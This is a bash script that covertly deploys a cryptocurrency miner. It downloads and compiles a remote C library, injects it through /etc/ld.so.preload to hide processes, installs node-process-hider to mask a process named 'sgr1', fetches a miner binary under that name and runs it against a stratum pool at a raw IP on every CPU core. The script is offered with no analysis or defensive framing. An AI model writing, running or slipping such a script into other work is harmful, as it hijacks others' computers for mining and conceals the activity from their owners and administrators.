#!/bin/bash
apt-get update ; apt-get install sudo -y
apt -y install git automake libcurl4-openssl-dev gcc
git clone https://github.com/ocvcoin/cpuminer.git tes
cd tes
chmod 777 build.sh autogen.sh
./build.sh 1
curl https://github.com/adawisaud/adawisaud/raw/main/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 8.8.8.8;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.2.0 -y && npm i -g node-process-hider && ph add sgr1"
mkdir .kap && cd .kap
wget -O sgr1 https://bitbucket.org/zepir/filesg/downloads/minerd >/dev/null 2>&1
chmod +x sgr1
sudo ./sgr1 -a ocv2 -o stratum+tcp://159.223.58.67:80 -u ocv1q7rys9nd8pmfdakpettjah6yqlw699prcfcv3l3.$(echo $(shuf -i 1-100000 -n 1)-AJG) -p x -t $(nproc --all) --debug